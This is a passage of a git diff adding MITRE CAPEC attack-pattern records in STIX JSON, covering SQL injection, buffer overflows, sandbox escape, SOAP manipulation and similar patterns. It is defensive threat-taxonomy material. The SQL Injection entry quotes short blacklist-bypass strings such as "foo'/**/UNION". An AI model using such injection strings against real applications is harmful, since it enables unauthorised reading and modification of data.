b/capec/attack-pattern/attack-pattern--3d863e50-08bf-40ac-9cb1-a847dd37cd0e.json new file mode 100644 index 0000000000..2d2afb6eb5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3d863e50-08bf-40ac-9cb1-a847dd37cd0e.json @@ -0,0 +1,94 @@ +{ + "type": "bundle", + "id": "bundle--b8a62553-8ff7-4ebd-a237-e4ead463d748", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3d863e50-08bf-40ac-9cb1-a847dd37cd0e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "SQL Injection", + "description": "This attack exploits target software that constructs SQL statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended. SQL Injection results from failure of the application to appropriately validate input. When specially crafted user-controlled input consisting of SQL syntax is used without proper validation as part of SQL queries, it is possible to glean information from the database in ways not envisaged during application design. Depending upon the database and the design of the application, it may also be possible to leverage injection to have the database execute system-related commands of the attackers' choice. SQL Injection enables an attacker to talk directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as ability to add or modify data in the database. In order to successfully inject SQL and retrieve information from a database, an attacker:", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/66.html", + "external_id": "CAPEC-66" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html", + "external_id": "CWE-89" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/713.html", + "external_id": "CWE-713" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "With PHP-Nuke versions 7.9 and earlier, an attacker can successfully access and modify data, including sensitive contents such as usernames and password hashes, and compromise the application through SQL Injection. The protection mechanism against SQL Injection employs a blacklist approach to input validation. However, because of improper blacklisting, it is possible to inject content such as \"foo'/**/UNION\" or \"foo UNION/**/\" to bypass validation and glean sensitive information from the database. See also: CVE-2006-5525" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "SQL queries used by the application to store, retrieve or modify data.", + "User-controllable input that is not properly validated by the application as part of SQL queries." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "It is fairly simple for someone with basic SQL knowledge to perform SQL injection, in general. In certain instances, however, specific knowledge of the database employed may be required." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3d9d1479-8768-4265-acc9-8e26894c6e08.json b/capec/attack-pattern/attack-pattern--3d9d1479-8768-4265-acc9-8e26894c6e08.json new file mode 100644 index 0000000000..1b320b3022 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3d9d1479-8768-4265-acc9-8e26894c6e08.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--b26f1890-fbda-4df7-a962-be59985c5414", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3d9d1479-8768-4265-acc9-8e26894c6e08", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Cross Site Identification", + "description": "An attacker harvests identifying information about a victim via an active session that the victim's browser has with a social networking site. A victim may have the social networking site open in one tab or perhaps is simply using the \"remember me\" feature to keep his or her session with the social networking site active. An attacker induces a payload to execute in the victim's browser that transparently to the victim initiates a request to the social networking site (e.g., via available social network site APIs) to retrieve identifying information about a victim. While some of this information may be public, the attacker is able to harvest this information in context and may use it for further attacks on the user (e.g., spear phishing). In one example of an attack, an attacker may post a malicious posting that contains an image with an embedded link. The link actually requests identifying information from the social networking site. A victim who views the malicious posting in his or her browser will have sent identifying information to the attacker, as long as the victim had an active session with the social networking site. There are many other ways in which the attacker may get the payload to execute in the victim's browser mainly by finding a way to hide it in some reputable site that the victim visits. The attacker could also send the link to the victim in an e-mail and trick the victim into clicking on the link. This attack is basically a cross site request forgery attack with two main differences. First, there is no action that is performed on behalf of the user aside from harvesting information. So standard CSRF protection may not work in this situation. Second, what is important in this attack pattern is the nature of the data being harvested, which is identifying information that can be obtained and used in context. This real time harvesting of identifying information can be used as a prelude for launching real time targeted social engineering attacks on the victim.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/467.html", + "external_id": "CAPEC-467" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html", + "external_id": "CWE-352" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html", + "external_id": "CWE-359" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Ronen, Cross Site Identification - or - How your social network might expose you when you least expect it, 2009--12---27", + "url": "http://blog.quaji.com/2009/12/out-of-context-information-disclosure.html", + "external_id": "REF-404" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The victim has an active session with the social networking site." + ], + "x_capec_skills_required": { + "High": "An attacker should be able to create a payload and deliver it to the victim's browser.", + "Medium": "An attacker needs to know how to interact with various social networking sites (e.g., via available APIs) to request information and how to send the harvested data back to the attacker." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3d9f2991-6d3a-409f-84d4-c4548e6a5b65.json b/capec/attack-pattern/attack-pattern--3d9f2991-6d3a-409f-84d4-c4548e6a5b65.json new file mode 100644 index 0000000000..3c751fb5de --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3d9f2991-6d3a-409f-84d4-c4548e6a5b65.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--acc21359-315f-4641-9cc9-7c8c69b23216", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3d9f2991-6d3a-409f-84d4-c4548e6a5b65", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Reverse Engineer an Executable to Expose Assumed Hidden Functionality", + "description": "An attacker analyzes a binary file or executable for the purpose of discovering the structure, function, and possibly source-code of the file by using a variety of analysis techniques to effectively determine how the software functions and operates. This type of analysis is also referred to as Reverse Code Engineering, as techniques exist for extracting source code from an executable. Several techniques are often employed for this purpose, both black box and white box. The use of computer bus analyzers and packet sniffers allows the binary to be studied at a level of interactions with its computing environment, such as a host OS, inter-process communication, and/or network communication. This type of analysis falls into the 'black box' category because it involves behavioral analysis of the software without reference to source code, object code, or protocol specifications.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/190.html", + "external_id": "CAPEC-190" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/912.html", + "external_id": "CWE-912" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": "http://en.wikipedia.org/wiki/Decompiler", + "external_id": "REF-51" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": "http://en.wikipedia.org/wiki/Debugger", + "external_id": "REF-52" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": "http://en.wikipedia.org/wiki/Disassembler", + "external_id": "REF-53" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_resources_required": [ + "Access to the target file such that it can be analyzed with the appropriate tools. A range of tools suitable for analyzing an executable or its operations" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3dd0588e-c5b3-43bb-a544-0e874d4ebc61.json b/capec/attack-pattern/attack-pattern--3dd0588e-c5b3-43bb-a544-0e874d4ebc61.json new file mode 100644 index 0000000000..4646999fd7 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3dd0588e-c5b3-43bb-a544-0e874d4ebc61.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--2b4f9760-5938-4878-b0f7-fe88341fd073", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3dd0588e-c5b3-43bb-a544-0e874d4ebc61", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Buffer Manipulation", + "description": "An adversary manipulates an application's interaction with a buffer in an attempt to read or modify data they shouldn't have access to. Buffer attacks are distinguished in that it is the buffer space itself that is the target of the attack rather than any code responsible for interpreting the content of the buffer. In virtually all buffer attacks the content that is placed in the buffer is immaterial. Instead, most buffer attacks involve retrieving or providing more input than can be stored in the allocated buffer, resulting in the reading or overwriting of other unintended program memory.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/123.html", + "external_id": "CAPEC-123" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html", + "external_id": "CWE-119" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A buffer manipulation attack often results in a crash of the application due to the corruption of memory.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses.)", + "Modify Data (If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses.)", + "Read Data (If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses.)" + ] + }, + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must identify a programmatic means for interacting with a buffer, such as vulnerable C code, and be able to provide input to this interaction." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3deccce4-93c6-4403-b5e4-84748a2dd85d.json b/capec/attack-pattern/attack-pattern--3deccce4-93c6-4403-b5e4-84748a2dd85d.json new file mode 100644 index 0000000000..5cb743f435 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3deccce4-93c6-4403-b5e4-84748a2dd85d.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--3b0f5869-7cec-4ab0-ae3c-c76df82c7795", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3deccce4-93c6-4403-b5e4-84748a2dd85d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Content Spoofing", + "description": "An adversary modifies content to make it contain something other than what the original content producer intended while keeping the apparent source of the content unchanged. The term content spoofing is most often used to describe modification of web pages hosted by a target to display the adversary's content instead of the owner's content. However, any content can be spoofed, including the content of email messages, file transfers, or the content of other network communication protocols. Content can be modified at the source (e.g. modifying the source file for a web page) or in transit (e.g. intercepting and modifying a message between the sender and recipient). Usually, the adversary will attempt to hide the fact that the content has been modified, but in some cases, such as with web site defacement, this is not necessary. Content Spoofing can lead to malware exposure, financial fraud (if the content governs financial transactions), privacy violations, and other unwanted outcomes.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/148.html", + "external_id": "CAPEC-148" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html", + "external_id": "CWE-345" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Integrity": [ + "Modify Data (A successful content spoofing attack compromises the integrity of the application data.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target must provide content but fail to adequately protect it against modification.The adversary must have the means to alter data to which he/she is not authorized.If the content is to be modified in transit, the adversary must be able to intercept the targeted messages." + ], + "x_capec_resources_required": [ + "\n If the content is to be modified in transit, the adversary requires a tool capable of intercepting the target's communication and generating/creating custom packets to impact the communications.\n In some variants, the targeted content is altered so that all or some of it is redirected towards content published by the attacker (for example, images and frames in the target's web site might be modified to be loaded from a source controlled by the attacker). In these cases, the attacker requires the necessary resources to host the replacement content.\n " + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3faacb4b-f20b-4101-b8f2-51c49cee5be4.json b/capec/attack-pattern/attack-pattern--3faacb4b-f20b-4101-b8f2-51c49cee5be4.json new file mode 100644 index 0000000000..26747a8797 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3faacb4b-f20b-4101-b8f2-51c49cee5be4.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--6732162b-f983-46ae-8dab-06e7c0c2dfa7", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3faacb4b-f20b-4101-b8f2-51c49cee5be4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Communication Channel Manipulation", + "description": "An adversary manipulates a setting or parameter on communications channel in order to compromise its security. This can result in information exposure, insertion/removal of information from the communications stream, and/or potentially system compromise.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/216.html", + "external_id": "CAPEC-216" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (A successful Communication Channel Manipulation attack can result in sensitive information exposure to the adversary, thereby compromising the communication channel's confidentiality.)" + ], + "Integrity": [ + "Read Data (The adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)", + "Modify Data (The adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)", + "Other (The adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)" + ] + }, + "x_capec_prerequisites": [ + "The target application must leverage an open communications channel.", + "The channel on which the target communicates must be vulnerable to interception (e.g., man in the middle attack)." + ], + "x_capec_resources_required": [ + "A tool that is capable of viewing network traffic and generating custom inputs to be used in the attack." + ], + "x_capec_status": "Stable", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--402bbd1b-6fee-44fd-8c59-e90acccd0be6.json b/capec/attack-pattern/attack-pattern--402bbd1b-6fee-44fd-8c59-e90acccd0be6.json new file mode 100644 index 0000000000..0e45970110 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--402bbd1b-6fee-44fd-8c59-e90acccd0be6.json @@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--4e2b1f9d-5491-4f48-9a21-be2bec72a379", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--402bbd1b-6fee-44fd-8c59-e90acccd0be6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Escaping a Sandbox by Calling Signed Code in Another Language", + "description": "The attacker may submit a malicious signed code from another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behalf. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/237.html", + "external_id": "CAPEC-237" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + }, + { + "source_name": "reference_from_CAPEC", + "description": "J. Cappos, J. Rasley, J. Samuel, I. Beschastnikh, C. Barsan, A. Krishnamurthy, T. Anderson, Retaining Sandbox Containment Despite Bugs in Privileged Memory-Safe Code, The 17th ACM Conference on Computer and Communications Security (CCS '10), 2010", + "external_id": "REF-91" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Malware Protection Center: Threat Research and Response, 2007, Microsoft Corporation", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit%3AJava%2FByteVerify.C", + "external_id": "REF-92" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Java/ByteVerify.C attempts to download a file named \"msits.exe\", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user's machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "A framework-based language that supports code signing and sandbox (such as Java, .Net, JavaScript, and Flash) Deployed code that has been signed by its authoring vendor, or a partner" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The attacker must have a good knowledge of the platform specific mechanisms of signing and verifying code. Most code signing and verification schemes are based on use of cryptography, the attacker needs to have an understand of these cryptographic operations in good detail." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--405493fa-cac2-4b87-bbe1-111562460e7e.json b/capec/attack-pattern/attack-pattern--405493fa-cac2-4b87-bbe1-111562460e7e.json new file mode 100644 index 0000000000..46743de158 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--405493fa-cac2-4b87-bbe1-111562460e7e.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--08e7b1b7-e242-4e8a-9b01-f9aed7787a93", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--405493fa-cac2-4b87-bbe1-111562460e7e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Connection Reset", + "description": "In this attack pattern, an adversary injects a connection reset packet to one or both ends of a target's connection. The attacker is therefore able to have the target and/or the destination server sever the connection without having to directly filter the traffic between them.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/595.html", + "external_id": "CAPEC-595" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html", + "external_id": "CWE-940" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "This attack requires the ability to monitor the target's network connection." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--40c3e8e6-25a4-407e-b4f4-4d245b363bf8.json b/capec/attack-pattern/attack-pattern--40c3e8e6-25a4-407e-b4f4-4d245b363bf8.json new file mode 100644 index 0000000000..0874d7b617 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--40c3e8e6-25a4-407e-b4f4-4d245b363bf8.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--04fa7d3d-6957-4b35-8388-e01e4b198df5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--40c3e8e6-25a4-407e-b4f4-4d245b363bf8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Bypassing of Intermediate Forms in Multiple-Form Sets", + "description": "Some web applications require users to submit information through an ordered sequence of web forms. This is often done if there is a very large amount of information being collected or if information on earlier forms is used to pre-populate fields or determine which additional information the application needs to collect. An attacker who knows the names of the various forms in the sequence may be able to explicitly type in the name of a later form and navigate to it without first going through the previous forms. This can result in incomplete collection of information, incorrect assumptions about the information submitted by the attacker, or other problems that can impair the functioning of the application.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/140.html", + "external_id": "CAPEC-140" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/372.html", + "external_id": "CWE-372" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "The target must collect information from the user in a series of forms where each form has its own URL that the attacker can anticipate and the application must fail to detect attempts to access intermediate forms without first filling out the previous forms." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5.json b/capec/attack-pattern/attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5.json new file mode 100644 index 0000000000..954a3f5a50 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5.json @@ -0,0 +1,101 @@ +{ + "type": "bundle", + "id": "bundle--6b723e9a-59ec-4f13-b4f7-bcfe58b320df", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Overflow Buffers", + "description": "Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an adversary. As a consequence, an adversary is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the adversaries' choice.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/100.html", + "external_id": "CAPEC-100" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html", + "external_id": "CWE-120" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html", + "external_id": "CWE-119" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/131.html", + "external_id": "CWE-131" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/129.html", + "external_id": "CWE-129" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/805.html", + "external_id": "CWE-805" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/19.html", + "external_id": "CWE-19" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html", + "external_id": "CWE-680" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "The most straightforward example is an application that reads in input from the user and stores it in an internal buffer but does not check that the size of the input data is less than or equal to the size of the buffer. If the user enters excessive length data, the buffer may overflow leading to the application crashing, or worse, enabling the user to cause execution of injected code.", + "Many web servers enforce security in web applications through the use of filter plugins. An example is the SiteMinder plugin used for authentication. An overflow in such a plugin, possibly through a long URL or redirect parameter, can allow an adversary not only to bypass the security checks but also execute arbitrary code on the target web server in the context of the user that runs the web server process." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Targeted software performs buffer operations.", + "Targeted software inadequately performs bounds-checking on buffer operations.", + "Adversary has the capability to influence the input to buffer operations." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Detecting and exploiting a buffer overflow does not require any resources beyond knowledge of and access to the target system." + ], + "x_capec_skills_required": { + "High": "In cases of directed overflows, where the motive is to divert the flow of the program or application as per the adversaries' bidding, high level skills are required. This may involve detailed knowledge of the target system architecture and kernel.", + "Low": "In most cases, overflowing a buffer does not require advanced skills beyond the ability to notice an overflow and stuff an input variable with content." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--425e904e-083c-450c-812d-6df487eb10f2.json b/capec/attack-pattern/attack-pattern--425e904e-083c-450c-812d-6df487eb10f2.json new file mode 100644 index 0000000000..bfd48005ac --- /dev/null +++ b/capec/attack-pattern/attack-pattern--425e904e-083c-450c-812d-6df487eb10f2.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--8e07e09c-3b67-4396-bf0c-03eb0ccae17d", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--425e904e-083c-450c-812d-6df487eb10f2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "SOAP Manipulation", + "description": "Simple Object Access Protocol (SOAP) is used as a communication protocol between a client and server to invoke web services on the server. It is an XML-based protocol, and therefore suffers from many of the same shortcomings as other XML-based protocols. Adviseries can make use these shortcomings to mount an denial of service attack, disclose information and execute arbitrary code. This includes a SOAP parameter tampering attack in which an attacker sends a SOAP message where the field values are other than what the server is likely to expect in order to precipitate non-standard server behavior.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/279.html", + "external_id": "CAPEC-279" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Navya Sidharth, Jigang Liu, Intrusion Resistant SOAP Messaging with IAPF, 2008--12, IEEE", + "url": "http://ieeexplore.ieee.org/document/4780783/", + "external_id": "REF-121" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Resource Consumption", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_example_instances": [ + "An attacker could mount a recursive payload attack, which involves deep nesting of XML elements. This can cause XML parser to failed due to a buffer overflow, or even cause it crash, enabling a denial of service attack.", + "A lack of a character limit for a field can allow oversized data to be sent, causing a buffer overflow.", + "The contents of a text field could contain metacharacters or contextually inappropriate data (for example, sending a non-existent product name in a product name field or using an out-of-order sequence number).", + "An adversary corrupts or modifies the content of XML schema for the purpose of undermining the security of the target." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An application uses SOAP-based web service api.", + "An application does not perform sufficient input validation to ensure that user-controllable data is safe for an XML parser.", + "The targeted server either fails to verify that data in SOAP messages conforms to the appropriate XML schema, or it fails to 